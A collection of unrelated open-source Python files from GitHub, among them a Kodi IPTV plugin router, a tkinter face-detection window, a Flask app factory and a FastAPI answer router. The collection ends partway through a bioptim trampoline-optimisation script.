    xbmcplugin.addDirectoryItem(_handle, url, list_item, True)
    # Archive entry (localized string 300112).
    list_item = xbmcgui.ListItem(label = addon.getLocalizedString(300112))
    url = get_url(action='list_archive', label = addon.getLocalizedString(300112))
    list_item.setArt({ 'thumb' : os.path.join(icons_dir , 'archive.png'), 'icon' : os.path.join(icons_dir , 'archive.png') })
    xbmcplugin.addDirectoryItem(_handle, url, list_item, True)
    # Settings entry (localized string 300100), optional.
    if addon.getSetting('hide_settings') != 'true':
        list_item = xbmcgui.ListItem(label = addon.getLocalizedString(300100))
        url = get_url(action='list_settings', label = addon.getLocalizedString(300100))
        list_item.setArt({ 'thumb' : os.path.join(icons_dir , 'settings.png'), 'icon' : os.path.join(icons_dir , 'settings.png') })
        xbmcplugin.addDirectoryItem(_handle, url, list_item, True)
    xbmcplugin.endOfDirectory(_handle)
def router(paramstring):
    """Dispatch a plugin invocation to the handler named by its query string.

    *paramstring* is the plugin URL query without the leading '?'; it is
    parsed into a dict and dispatched on the 'action' key.  With no
    parameters the root menu is rendered instead.

    :raises ValueError: for an unknown action (message text is Czech:
        "Unknown parameter").
    """
    params = dict(parse_qsl(paramstring))
    check_settings()
    if params:
        if params['action'] == 'list_live':
            list_live(label = params['label'])
        elif params['action'] == 'play_live':
            play_live(id = params['id'])
        elif params['action'] == 'list_archive':
            list_archive(label = params['label'])
        elif params['action'] == 'list_archive_days':
            list_archive_days(id = params['id'], label = params['label'])
        elif params['action'] == 'list_program':
            list_program(id = params['id'], day_min = params['day_min'], label = params['label'])
        elif params['action'] == 'play_archive':
            play_archive(id = params['id'], channel_id = params['channel_id'])
        elif params['action'] == 'manage_channels':
            manage_channels(label = params['label'])
        elif params['action'] == 'reset_channels_list':
            channels = Channels()
            channels.reset_channels()
        elif params['action'] == 'restore_channels':
            channels = Channels()
            channels.restore_channels(backup = params['backup'])
        elif params['action'] == 'list_channels_list_backups':
            list_channels_list_backups(label = params['label'])
        elif params['action'] == 'list_channels_edit':
            list_channels_edit(label = params['label'])
        elif params['action'] == 'edit_channel':
            edit_channel(id = params['id'])
        elif params['action'] == 'delete_channel':
            delete_channel(id = params['id'])
        elif params['action'] == 'change_channels_numbers':
            change_channels_numbers(from_number =params['from_number'], direction = params['direction'])
        elif params['action'] == 'list_channels_groups':
            list_channels_groups(label = params['label'])
        elif params['action'] == 'add_channel_group':
            add_channel_group(label = params['label'])
        elif params['action'] == 'edit_channel_group':
            edit_channel_group(group = params['group'], label = params['label'])
        elif params['action'] == 'delete_channel_group':
            delete_channel_group(group = params['group'])
        elif params['action'] == 'select_channel_group':
            select_channel_group(group = params['group'])
        elif params['action'] == 'edit_channel_group_list_channels':
            edit_channel_group_list_channels(group = params['group'], label = params['label'])
        elif params['action'] == 'edit_channel_group_add_channel':
            edit_channel_group_add_channel(group = params['group'], channel = params['channel'])
        elif params['action'] == 'edit_channel_group_add_all_channels':
            edit_channel_group_add_all_channels(group = params['group'])
        elif params['action'] == 'edit_channel_group_delete_channel':
            edit_channel_group_delete_channel(group = params['group'], channel = params['channel'])
        elif params['action'] == 'list_devices':
            list_devices(label = params['label'])
        elif params['action'] == 'remove_device':
            remove_device(id = params['id'], title = params['title'], last_activity = params['last_activity'])
        elif params['action'] == 'list_settings':
            list_settings(label = params['label'])
        elif params['action'] == 'addon_settings':
            xbmcaddon.Addon().openSettings()
        elif params['action'] == 'reset_session':
            session = Session()
            session.remove_session()
        elif params['action'] == 'generate_playlist':
            # With 'output_file' the call comes from IPTV Simple Client, which
            # expects a one-item directory response as acknowledgement.
            if 'output_file' in params:
                generate_playlist(params['output_file'])
                xbmcplugin.addDirectoryItem(_handle, '1', xbmcgui.ListItem())
                xbmcplugin.endOfDirectory(_handle, succeeded = True)
            else:
                generate_playlist()
        elif params['action'] == 'generate_epg':
            if 'output_file' in params:
                generate_epg(params['output_file'])
                xbmcplugin.addDirectoryItem(_handle, '1', xbmcgui.ListItem())
                xbmcplugin.endOfDirectory(_handle, succeeded = True)
            else:
                generate_epg()
        elif params['action'] == 'iptsc_play_stream':
            # Catchup playback when both timestamps are supplied, live otherwise.
            if 'catchup_start_ts' in params and 'catchup_end_ts' in params:
                play_catchup(id = params['id'], start_ts = params['catchup_start_ts'], end_ts = params['catchup_end_ts'])
            else:
                play_live(params['id'])
        else:
            raise ValueError('Neznámý parametr: {0}!'.format(paramstring))
    else:
        main_menu()
if __name__ == '__main__':
    # Kodi passes the plugin query string as sys.argv[2]; strip the leading '?'.
    router(sys.argv[2][1:])
| waladir/plugin.video.rebittv | main.py | main.py | py | 7,178 | python | en | code | 0 | github-code | 36 |
18041766413 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 9 11:35:21 2023
@author: akava
"""
import tkinter as tk
from tkinter import ttk
from PIL import Image, ImageTk
import customtkinter, tkinter
from retinaface import RetinaFace
import cv2
from gender_classification.gender_classifier_window import GenderClassifierWindow
class SinglePhotoDetectionPage:
    """Secondary window listing every face RetinaFace finds in one photo.

    The user can tick faces to delete, go back, return to the main menu, or
    press "Aceptar" to send the remaining face crops on to the
    gender-classification window.
    """
    def __init__(self, Load, App, App_window, image1, options):
        """Detect the faces in *image1* and build the selection UI.

        Load: previous (loader) window; hidden while this page is shown.
        App / App_window: application object and main window, forwarded to
            the next window and restored on close.
        image1: source image; treated as a BGR array (see cv2 usage below).
        options: unused in this class — NOTE(review): confirm callers before
            removing the parameter.
        """
        self.App = App
        self.App_window = App_window
        self.Load = Load
        self.root = customtkinter.CTkToplevel()
        self.root.title("Pagina de Deteccion de Rostros de una Sola Foto")
        self.root.geometry("800x600")  # window size
        self.root.resizable(False, False)
        self.checkbox_vars = []
        # Hook the close event of this secondary window
        self.root.protocol("WM_DELETE_WINDOW", self.on_closing)
        # Control flag tracking whether any image has been deleted
        self.images_deleted = False
        # Aligned face crops returned by RetinaFace (numpy arrays)
        self.detected_faces = RetinaFace.extract_faces(image1, align = True)
        num_personas= len(self.detected_faces)  # NOTE(review): unused local
        self.scaled_image=image1
        self.Load.withdraw()
        main_frame = customtkinter.CTkFrame(self.root, fg_color=("transparent"))
        main_frame.pack(fill=tk.BOTH, expand=True)
        # Frame for the instruction message
        message_frame = customtkinter.CTkFrame(main_frame, fg_color=("transparent"))
        message_frame.pack(side=tk.TOP, fill=tk.X)
        # Label: "Select the photos you want to delete"
        message_label = customtkinter.CTkLabel(message_frame, text="Selecciona las fotos que deseas eliminar:", font=('Calibri', 15), fg_color="transparent", width=110)
        message_label.pack(padx=10, pady=5, anchor=tk.W)
        # Frame holding the face thumbnails
        images_frame = customtkinter.CTkFrame(main_frame, fg_color=("transparent"))
        images_frame.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
        # Frame holding the action buttons
        button_frame = customtkinter.CTkFrame(main_frame, fg_color="transparent")
        button_frame.pack(side=tk.RIGHT, fill=tk.Y)
        face_count_image = customtkinter.CTkImage(Image.open("images/face.png"), size=(26, 26))
        self.face_count_label1 = customtkinter.CTkButton(button_frame, image=face_count_image, text_color="black", fg_color="transparent", text="", width=30)
        self.face_count_label1.pack(padx=10, pady=10, anchor=tk.W)
        # Navigation / action buttons on the right-hand side
        home_image = customtkinter.CTkImage(Image.open("images/home.png"), size=(26, 26))
        home_button = customtkinter.CTkButton(
            button_frame,
            image=home_image,
            fg_color="transparent",
            text_color= "black",
            text="Home", width=10,
            command=self.return_to_main_menu)
        home_button.pack(pady=10)
        home_button.pack(padx=10, pady=10, anchor=tk.W)  # NOTE(review): packed twice
        continue_image = customtkinter.CTkImage(Image.open("images/aceptar.png"), size=(26, 26))
        continue_button = customtkinter.CTkButton(
            button_frame,
            text="Aceptar",
            width=20,
            command=self.continue_pressed,
            image=continue_image,
            text_color="black",
            fg_color="transparent"
        )
        continue_button.pack(padx=10, pady=10, anchor=tk.W)
        delete_image = customtkinter.CTkImage(Image.open("images/borrar.png"), size=(26, 26))
        delete_button = customtkinter.CTkButton(
            button_frame,
            text="Borrar",
            width=20,
            command=self.delete_selected,
            image=delete_image,
            text_color="black",
            fg_color="transparent"
        )
        delete_button.pack(padx=10, pady=10, anchor=tk.W)
        back_image = customtkinter.CTkImage(Image.open("images/volver.png"), size=(26, 26))
        back_button = customtkinter.CTkButton(
            button_frame,
            text="Regresar",
            width=20,
            command=self.go_back,
            image=back_image,
            text_color="black",
            fg_color="transparent"
        )
        back_button.pack(padx=10, pady=10, anchor=tk.W)
        # Scrollbar for the thumbnail area
        scroll_y = tk.Scrollbar(images_frame, orient=tk.VERTICAL)
        scroll_y.pack(side=tk.RIGHT, fill=tk.Y)
        # Canvas that scrolls the thumbnail frame
        canvas = tk.Canvas(images_frame, yscrollcommand=scroll_y.set)
        canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
        scroll_y.config(command=canvas.yview)
        # Inner frame (embedded in the canvas) that holds the thumbnails
        self.frame = customtkinter.CTkFrame(canvas, fg_color=("transparent"), width=650)
        canvas.create_window((0, 0), window=self.frame, anchor=tk.NW)
        self.display_detected_faces(self.frame , self.detected_faces, self.scaled_image )
        # Make the canvas scrollable over the full thumbnail area
        canvas.update_idletasks()
        canvas.config(scrollregion=canvas.bbox("all"))
    # Remove the faces whose checkbox is ticked
    def delete_selected(self):
        """Drop the ticked faces, record the deletion, and refresh the grid."""
        self.detected_faces = self.delete_selected_images(self.scaled_image, self.detected_faces, self.checkbox_vars)
        # Remember that at least one image was removed
        self.images_deleted = True
        self.display_detected_faces(self.frame, self.detected_faces, self.scaled_image)
    def display_detected_faces(self, frame, detected_faces, scaled_image):
        """Rebuild the thumbnail grid (6 columns) with one checkbox per face.

        Returns the list of full-size PhotoImage objects; references are kept
        on ``self.person_images_tk`` so Tk does not garbage-collect them.
        ``scaled_image`` is accepted but not used here.
        """
        for widget in frame.winfo_children():
            widget.destroy()
        self.face_count_label1.configure(text="Rostros: {}".format(self.count_faces(self.detected_faces)))
        # Fresh list tracking each thumbnail's checkbox state
        self.checkbox_vars = []
        # Grid position counters for the thumbnails
        col_count = 0
        row_count = 0
        self.person_images_tk = []
        style = ttk.Style()
        style.configure('TCheckbutton', font=('Calibri', 9))
        # One thumbnail + checkbox per detected face
        for i, detection in enumerate(detected_faces):
            person_image = detection
            # Convert the NumPy (BGR) image to a PIL (RGB) image
            person_image_pil = Image.fromarray(cv2.cvtColor(person_image, cv2.COLOR_BGR2RGB))
            # Resize the crop
            person_image_pil = person_image_pil.resize((150, 150), Image.LANCZOS)
            # Smaller copy actually shown in the interface
            person_image_pil_small = person_image_pil.resize((80, 80), Image.LANCZOS)
            # Full-size PhotoImage (kept only as a reference)
            person_image_tk = ImageTk.PhotoImage(person_image_pil) # full-size image
            self.person_images_tk.append(person_image_tk) # keeps it alive for Tk
            # State variable for this face's checkbox
            checkbox_var = tk.BooleanVar(value=False)
            self.checkbox_vars.append(checkbox_var)
            # PhotoImage for the on-screen thumbnail
            person_image_small_tk = ImageTk.PhotoImage(person_image_pil_small)
            # Show the thumbnail in a label inside the frame
            label = customtkinter.CTkLabel(frame, image=person_image_small_tk, text="")
            # Checkbox to select this image for deletion
            checkbox = ttk.Checkbutton(frame, text="Seleccionar", variable=checkbox_var)
            # Place label and checkbox via grid
            label.grid(row=row_count, column=col_count, padx=9, pady=5)
            checkbox.grid(row=row_count + 1, column=col_count, padx=9, pady=0)
            # Advance the column counter
            col_count += 1
            # Wrap to a new row after 6 columns
            if col_count == 0:  # NOTE(review): unreachable — col_count >= 1 here
                row_count += 2
            elif col_count >= 6:
                col_count = 0
                row_count += 2
        return self.person_images_tk
    def on_click(self, index):
        """Debug helper: print the clicked index."""
        print(index)
    def continue_pressed(self):
        """Open the gender-classifier window with the surviving face crops."""
        # Use the post-deletion list only when something was actually removed
        if self.images_deleted:
            self.root.withdraw()
            faces=self.extract_faces(self.scaled_image, self.updated_detected_faces)
            app = GenderClassifierWindow(self.root, self.App, self.App_window, faces)
        else:
            self.root.withdraw()
            faces=self.extract_faces(self.scaled_image, self.detected_faces)
            app = GenderClassifierWindow(self.root, self.App, self.App_window, faces)
    def count_faces(self, detected_faces):
        """Return the number of entries in *detected_faces*."""
        return len(detected_faces)
    def go_back(self):
        """Return to the previous (loader) window."""
        # Make the previous window visible again
        self.Load.deiconify()
        # Close the current window
        self.root.destroy()
    def extract_faces(self, scaled_image, detected_faces):
        """Return the face crops as a plain list.

        The detections are already cropped images; ``scaled_image`` is kept
        for signature compatibility.  The commented code below shows the
        older bounding-box based cropping.
        """
        faces = [] # list holding the extracted face crops
        # Iterate over the face detections
        for detection in detected_faces:
            #x1, y1, width1, height1 = detection['box']
            #x1, y1, width1, height1 = int(x1), int(y1), int(width1), int(height1)
            #face_roi = scaled_image[y1:y1+height1, x1:x1+width1]
            #faces.append(face_roi)
            faces.append(detection)
        return faces
    def delete_selected_images(self, scaled_image, detected_faces, checkbox_vars):
        """Return (and remember on self) the faces whose checkbox is NOT ticked."""
        # Keep only the unticked detections
        updated_detected_faces = []
        for detection, checkbox_var in zip(detected_faces, checkbox_vars):
            if not checkbox_var.get():
                updated_detected_faces.append(detection)
        self.updated_detected_faces = updated_detected_faces
        return updated_detected_faces
    def on_closing(self):
        """Window-manager close button: restore the main window and tear down."""
        # Restore the main window
        self.App_window.deiconify()
        # Close this page and the loader page
        self.root.destroy()
        self.Load.destroy()
    def return_to_main_menu(self):
        """Home button: restore the main window and tear this page down."""
        # Restore the main window
        self.App_window.deiconify()
        # Close this page and the loader page
        self.root.destroy()
        self.Load.destroy()
# -*- coding: utf-8 -*-
from pathlib import Path
class Manager:
    """Generates the top-level README.md index for the Quera-solutions repo."""

    @staticmethod
    def create_readme():
        """Regenerate ``README.md`` from the question directories.

        Scans every non-hidden directory next to this file and writes one
        markdown table row per question: a running index, the first two
        lines of the question's ``readme.md`` (title and link), one link per
        solution-language sub-directory, and any extra ``*.md`` / ``*.pdf``
        files.

        Previously this was a bare function in the class body (no ``self``),
        so it could only be invoked as ``Manager.create_readme()`` and
        crashed when called on an instance; ``@staticmethod`` makes both
        call forms work without changing the existing call site.
        """
        root_path = Path(__file__).parent
        # Persian header written at the top of the generated README
        # (runtime string — intentionally left untranslated).
        info ="""## حل سوالات کوئرا
برای دیدن صفحه ی اصلی هر سوال در سایت کوئرا میتوانید روی نام هر سوال کلیک کنید و یا در قسمت توضیحات روی PDF کلیک کنید.
showmeyourcode.ir
"""
        # Table column titles (Persian: question number, question name, ...).
        table_header = [
            "شماره سؤال",
            "نام سؤال",
            "youtube",
            "لینک جواب",
            "توضیحات",
        ]
        with open('README.md', "w", encoding="utf8") as main_readme:
            main_readme.write(info + '\n')
            main_readme.write("|" + "|".join(table_header) + "|" + '\n')
            main_readme.write("|-" * len(table_header) + "|" + '\n')
            index = 1
            for question_path in root_path.glob(r"*/"):
                # Skip plain files and hidden directories such as ".git".
                if not question_path.is_file() and not str(question_path.relative_to(root_path)).startswith("."):
                    main_readme.write(f"|{index}")
                    # First two lines of the local readme: title, then link.
                    with open(str(question_path.joinpath("readme.md")), "r", encoding="utf8") as local_readme:
                        main_readme.write("|" + local_readme.readline().strip())
                        main_readme.write("|" + local_readme.readline().strip())
                    main_readme.write("|")
                    # One link per solution-language sub-directory; spaces are
                    # URL-encoded and Windows path separators normalised.
                    for language in question_path.glob("*"):
                        if language.is_dir():
                            readme_path = str(language.relative_to(root_path)).replace(' ', '%20').replace('\\', '/')
                            main_readme.write(f"[{str(language.relative_to(question_path))}]({readme_path}), ")
                    main_readme.write("|")
                    # Extra markdown and PDF attachments of the question.
                    for local_readmes in question_path.glob("*.md"):
                        if local_readmes.is_file():
                            readme_path = str(local_readmes.relative_to(root_path)).replace(' ', '%20').replace('\\', '/')
                            main_readme.write(f"[readme]({readme_path}), ")
                    for pdfs in question_path.glob("*.pdf"):
                        if pdfs.is_file():
                            pdf = str(pdfs.relative_to(root_path)).replace(' ', '%20').replace('\\', '/')
                            main_readme.write(f"[pdf]({pdf}), ")
                    main_readme.write("|\n")
                    index += 1
# Script entry point: rebuild README.md when run directly.
if __name__ == "__main__":
    Manager.create_readme()
| MohammadNPak/quera.ir | manage.py | manage.py | py | 2,594 | python | en | code | 40 | github-code | 36 |
# coding=gbk
import numpy as np
import pandas as pd
import re
from jieba import lcut
def clean_str(text):
    """Lower-case *text* and normalise punctuation and English contractions.

    The substitutions are applied strictly in order (later rules see the
    output of earlier ones), reproducing the original regex pipeline:
    strip disallowed characters, expand contractions ("what's" -> "what is"),
    space out operators, expand "Nk" to "N000", merge common abbreviations,
    then collapse runs of whitespace and trim the ends.
    """
    # (pattern, replacement) pairs; ORDER MATTERS.
    rules = (
        (r"[^A-Za-z0-9^,!.\/'+-=]", " "),
        (r"what's", "what is "),
        (r"that's", "that is "),
        (r"there's", "there is "),
        (r"it's", "it is "),
        (r"\'s", " "),
        (r"\'ve", " have "),
        (r"can't", "can not "),
        (r"n't", " not "),
        (r"i'm", "i am "),
        (r"\'re", " are "),
        (r"\'d", " would "),
        (r"\'ll", " will "),
        (r",", " "),
        (r"\.", " "),
        (r"!", " ! "),
        (r"\/", " "),
        (r"\^", " ^ "),
        (r"\+", " + "),
        (r"\-", " - "),
        (r"\=", " = "),
        (r"'", " "),
        (r"(\d+)(k)", r"\g<1>000"),
        (r":", " : "),
        (r" e g ", " eg "),
        (r" b g ", " bg "),
        (r" u s ", " american "),
        (r"\0s", "0"),
        (r" 9 11 ", "911"),
        (r"e - mail", "email"),
        (r"j k", "jk"),
        (r"\s{2,}", " "),
    )
    cleaned = text.lower()
    for pattern, replacement in rules:
        cleaned = re.sub(pattern, replacement, cleaned)
    return cleaned.strip()
# data_training layout: document text in column 4, tf-idf value in column 7.
# my_data layout: document text in column 4, click count in column 3.
def load_data_and_labels(path):
    """Read the training workbook and return tokenised texts plus targets.

    This is the loader used by train.py (might later be replaced by a
    MySQL-backed loader).  Every sheet of the workbook is scanned; column 4
    holds the raw document text and column 7 the tf-idf target value.

    Parameters
    ----------
    path : str
        Path to the ``.xlsx`` corpus.

    Returns
    -------
    tuple
        ``x_text`` — per document, a list of jieba-tokenised, space-joined
        sentence strings (documents are split on sentence-ending
        punctuation first); ``data_y`` — the target value of each document.

    Improvements over the original: the workbook is opened once instead of
    twice (``pd.ExcelFile`` and ``pd.io.excel.ExcelFile`` are the same
    class), and the unused ``data_x`` list and dead max-length tracking
    were removed.
    """
    data_x_list, data_y = [], []
    workbook = pd.ExcelFile(path)  # open the workbook once
    for sheet in workbook.sheet_names:
        texts = pd.read_excel(workbook, sheet_name=sheet, usecols=[4]).values.tolist()
        targets = pd.read_excel(workbook, sheet_name=sheet, usecols=[7]).values.tolist()
        for row in texts:
            # Normalise ideographic (U+3000) and non-breaking (U+00A0) spaces.
            data_x_list.append(str(row[0]).strip().replace(u'\u3000', u' ').replace(u'\xa0', u' '))
        for row in targets:
            data_y.append(row[0])
    data = []
    for doc_id in range(len(data_x_list)):
        paragraph = data_x_list[doc_id]
        # re.split with a capturing group keeps the delimiters, so the result
        # alternates [text, delimiter, text, ...]; glue each text back onto
        # its sentence-ending punctuation mark.
        parts = re.split('(。|!|\!|\.|?|\?)', paragraph)
        sentences = []
        for i in range(int(len(parts) / 2)):
            sentences.append(parts[2 * i] + parts[2 * i + 1])
        # Tokenise each sentence with jieba and re-join with single spaces.
        tokenised = [" ".join(lcut(sentence)) for sentence in sentences]
        data.append([doc_id, tokenised])
    print(path)
    df = pd.DataFrame(data=data, columns=["id", "sentences"])
    x_text = df['sentences'].tolist()
    return x_text, data_y
def batch_iter(data, batch_size, num_epochs, shuffle=False):
    """Yield the dataset one mini-batch (numpy array) at a time.

    Exactly one pass over the data is produced; ``num_epochs`` is accepted
    for call-site compatibility but not used (the epoch loop in the
    original implementation was commented out).  With ``shuffle=True`` the
    sample order is randomised once before batching.
    """
    samples = np.array(data)
    sample_count = len(samples)
    # Ceiling division written the same way as the original so that an
    # empty dataset still yields one (empty) batch.
    batch_count = int((sample_count - 1) / batch_size) + 1
    if shuffle:
        order = np.random.permutation(np.arange(sample_count))
        samples = samples[order]
    for batch_index in range(batch_count):
        lo = batch_index * batch_size
        hi = min(lo + batch_size, sample_count)
        yield samples[lo:hi]
# Ad-hoc smoke test: load the training workbook and report corpus sizes.
# NOTE(review): testFile is defined but never used in this block.
if __name__ == "__main__":
    trainFile = 'data.xlsx'
    testFile = 'SemEval2010_task8_all_data/SemEval2010_task8_testing_keys/TEST_FILE_FULL.TXT'
    a, b = load_data_and_labels(trainFile)
    print(len(a))
    print(len(b))
def eval_load_data_and_labels(path):  # loader used by eval.py; may later be replaced by a MySQL-backed loader
    """Read the evaluation workbook and return tokenised and raw texts plus targets.

    Mirror of ``load_data_and_labels`` but reads column 5 (text) and
    column 8 (target) and additionally returns the un-tokenised text.

    Returns
    -------
    tuple
        ``x_text`` — per document, a list of jieba-tokenised sentence
        strings (fed to the model); ``data_x`` — the raw text, one
        single-element list per document (used for output);
        ``data_y`` — the target value of each document.
    """
    data_x, data_x_list, data_y = [], [], []
    f = pd.ExcelFile(path)
    io = pd.io.excel.ExcelFile(path)
    for i in f.sheet_names: # iterate over every sheet in the workbook
        dx = pd.read_excel(io, sheet_name=i, usecols=[5]) # read column 5; change this index to read a different column
        dy = pd.read_excel(io, sheet_name=i, usecols=[8])
        datax = dx.values.tolist()
        datay = dy.values.tolist()
        for j in datax:
            # normalise ideographic (U+3000) and non-breaking (U+00A0) spaces
            l = str(j[0]).strip().replace(u'\u3000', u' ').replace(u'\xa0', u' ')
            k = [str(j[0]).strip().replace(u'\u3000', u' ').replace(u'\xa0', u' ')] # punctuation still needs replacing here
            data_x.append(k)
            data_x_list.append(l)
        for m in datay:
            data_y.append(m[0])
    data = []
    # lines = [line.strip() for line in open(path)]
    max_sentence_length = 0
    max_paragraph_length = 0
    for id in range(len(data_x_list)): # main goal is tokenisation; the y values are already prepared
        paragraphs = data_x_list[id] # the document text
        # split on sentence-ending punctuation, keeping the delimiters
        sentences_split = re.split('(。|!|\!|\.|?|\?)', paragraphs)
        sentences = []
        for i in range(int(len(sentences_split) / 2)):
            # glue each text fragment back onto its punctuation mark
            sent = sentences_split[2 * i] + sentences_split[2 * i + 1]
            sentences.append(sent)
        # sentences = nltk.sent_tokenize(paragraphs)  # regex split used instead
        if max_paragraph_length < len(sentences):
            max_paragraph_length = len(sentences)
        for n, sentence in enumerate(sentences):
            # sentence = clean_str(sentence)
            tokens = lcut(sentence)
            # tokens = nltk.word_tokenize(sentence)  # jieba is used instead
            if max_sentence_length < len(tokens):
                max_sentence_length = len(tokens)
            # if len(tokens) > FLAGS.max_sentence_length:
            #     print(tokens)
            sentence = " ".join(tokens) # re-join tokens with single spaces
            sentences[n] = sentence
        data.append([id, sentences])
    print(path)
    print("max sentence length = {}\n".format(max_sentence_length))
    print("max_paragraph_length = {}\n".format(max_paragraph_length))
    df = pd.DataFrame(data=data, columns=["id", "sentences"]) # DataFrame with columns id, sentences
    x_text = df['sentences'].tolist() # back to a plain list
    return x_text, data_x, data_y # x_text: processed text (for the model); data_x: raw text (for output)
| mrgulugulu/text_regression | data_helpers.py | data_helpers.py | py | 7,290 | python | en | code | 0 | github-code | 36 |
import pandas as pd
import os
# Folder holding the semicolon-separated CSV exports.
# NOTE(review): hard-coded absolute Windows path — adjust per machine.
path = "C:\\Users\\brunn\\Desktop\\SENAC\\topicos-avancados"
files = os.listdir(path)
extension = 'csv'
# Keep only the files whose name ends in "csv".
# NOTE(review): the slice check also matches e.g. "data.Xcsv";
# str.endswith('.csv') would be stricter.
files_open = [path + '\\' + f for f in files if f[-len(extension):] == extension]
list_of_dataframes = []
for file in files_open:
    list_of_dataframes.append(pd.read_csv(file, delimiter=';'))
# Concatenate every CSV into a single DataFrame.
merged_data = pd.concat(list_of_dataframes)
merged_data | brunnolorenzoni/scripts-topicos-avancados | loadfile.py | loadfile.py | py | 389 | python | en | code | 0 | github-code | 36 |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
db = SQLAlchemy()
def create_app():
    """Application factory: build, configure and return the Flask app.

    Enables CORS, configures the SQLite database, creates the tables, and
    registers the main blueprint.
    """
    flask_app = Flask(__name__)
    CORS(flask_app)  # enable cross-origin requests for every route
    flask_app.config.update(
        FLASK_DEBUG=True,
        SECRET_KEY='secret-key-goes-here',
        SQLALCHEMY_DATABASE_URI='sqlite:///db.sqlite',
    )
    # Import the models before create_all() so their tables are registered
    # with SQLAlchemy's metadata.
    from .models import Result, Patient, DeliveryReports
    db.init_app(flask_app)
    with flask_app.app_context():
        db.create_all()
    # Blueprint import is deferred to avoid a circular import at module load.
    from .main import main as main_blueprint
    flask_app.register_blueprint(main_blueprint)
    return flask_app
| KariukiAntony/MMUST-HealthIT-TAT-App | app/__init__.py | __init__.py | py | 571 | python | en | code | 1 | github-code | 36 |
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session
from starlette import status
from starlette.responses import RedirectResponse
from database import get_db
from domain.answer import answer_schema, answer_crud
from domain.question import question_crud, question_schema
from domain.user.user_router import get_current_user
from models import User
router = APIRouter(
prefix="/api/answer",
)
@router.post("/create/{question_id}", response_model=question_schema.Question)
def answer_create(question_id: int,
                  _answer_create: answer_schema.AnswerCreate,
                  db: Session = Depends(get_db),
                  current_user: User = Depends(get_current_user)):
    """Create an answer on the given question, then redirect to its detail page.

    Raises 404 when the question does not exist.  NOTE(review): the route
    declares ``response_model=question_schema.Question`` but actually
    returns a 303 redirect — confirm the declared model is intentional.
    """
    # create answer
    question = question_crud.get_question(db, question_id=question_id)
    if not question:
        raise HTTPException(status_code=404, detail="Question not found")
    answer_crud.create_answer(db, question=question,
                              answer_create=_answer_create,
                              user=current_user)
    # redirect back to the question's detail view; the import is local to
    # avoid a circular import between the answer and question routers
    from domain.question.question_router import router as question_router
    url = question_router.url_path_for('question_detail',
                                      question_id=question_id)
    return RedirectResponse(url, status_code=303)
@router.put("/update", status_code=status.HTTP_204_NO_CONTENT)
def amswer_update(_answer_update: answer_schema.AnswerUpdate, db: Session = Depends(get_db), current_user: User = Depends(get_current_user)):
    """Update an answer's content; only its author may edit it.

    Returns 204 on success; 400 when the answer is missing or the caller
    is not the author (detail messages are in Korean).
    NOTE(review): the function name ``amswer_update`` and the keyword
    ``answer_updaete`` look like typos, but renaming would change the
    route's operation name and presumably the crud signature — fix both
    sides together if desired.
    """
    db_answer = answer_crud.get_answer(db, answer_id=_answer_update.answer_id)
    if not db_answer:
        # "데이터를 찾을 수 없습니다." = "data not found"
        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="데이터를 찾을 수 없습니다.")
    if current_user.id != db_answer.user.id:
        # "수정 권한이 없습니다." = "no permission to edit"
        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="수정 권한이 없습니다.")
    answer_crud.update_answer(db=db, db_answer=db_answer, answer_updaete=_answer_update)
@router.get("/detail/{answer_id}", response_model=answer_schema.Answer)
def answer_detail(answer_id: int, db: Session = Depends(get_db)):
    """Return a single answer looked up by its primary key."""
    return answer_crud.get_answer(db, answer_id=answer_id)
@router.post("/vote", status_code=status.HTTP_204_NO_CONTENT)
def answer_vote(_answer_vote: answer_schema.AnswerVote, db: Session = Depends(get_db), current_user: User =Depends(get_current_user)):
    """Register the current user's vote on an answer.

    Returns 204 on success; 400 when the answer id does not exist
    (Korean detail message).
    """
    db_answer = answer_crud.get_answer(db, answer_id=_answer_vote.answer_id)
    if not db_answer:
        # "데이터를 찾을 수 없다." = "data not found"
        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="데이터를 찾을 수 없다.")
    answer_crud.vote_answer(db, db_answer=db_answer, db_user=current_user)
"""
The goal of this program is to optimize the movement to achieve a rudi out pike (803<) for left twisters.
"""
import os
import numpy as np
import biorbd_casadi as biorbd
from casadi import MX, Function
from bioptim import (
OptimalControlProgram,
DynamicsList,
DynamicsFcn,
ObjectiveList,
ObjectiveFcn,
BoundsList,
InitialGuessList,
InterpolationType,
OdeSolver,
Node,
Solver,
BiMappingList,
CostType,
ConstraintList,
ConstraintFcn,
PenaltyController,
MultiStart,
Solution,
MagnitudeType,
BiorbdModel,
)
import time
import pickle
class Model:
    """Container for the solver configuration of one optimisation run.

    The original docstring described the flags incorrectly ("returns true
    if empty" etc.); the descriptions below follow the commented-out
    argparse help text in this file.

    Attributes
    ----------
    model : str
        Path/name of the bioMod model file.
    with_hsl : bool
        If True, use the HSL linear solvers (libhsl).
    n_threads : int
        Number of threads handed to the solver.
    savesol : bool
        Whether the solution should be saved.
    show_online : bool
        Whether to show graphs during optimization.
    print_ocp : bool
        Whether to print the OCP.
    """

    def __init__(self, model: str, n_threads: int = 5, with_hsl: bool = False,
                 savesol: bool = False, show_online: bool = False,
                 print_ocp: bool = False):
        self.model = model
        self.with_hsl = with_hsl
        self.n_threads = n_threads
        self.savesol = savesol
        self.show_online = show_online
        self.print_ocp = print_ocp
#
# # if savesol :
# # return False
#
# if show_online:
# return False
#
# if print_ocp:
# return True
# parser = argparse.ArgumentParser()
# parser.add_argument("model", type=str, help="the bioMod file")
# parser.add_argument("--no-hsl", dest='with_hsl', action='store_false', help="do not use libhsl")
# parser.add_argument("-j", default=1, dest='n_threads', type=int, help="number of threads in the solver")
# parser.add_argument("--no-sol", action='store_false', dest='savesol', help="do not save the solution")
# parser.add_argument("--no-show-online", action='store_false', dest='show_online', help="do not show graphs during optimization")
# parser.add_argument("--print-ocp", action='store_true', dest='print_ocp', help="print the ocp")
# args = parser.parse_args()
#
try:
import IPython
IPYTHON = True
except ImportError:
print("No IPython.")
IPYTHON = False
def minimize_dofs(controller: PenaltyController, dofs: list, targets: list):
    """Custom bioptim objective: squared distance of selected DoFs from targets.

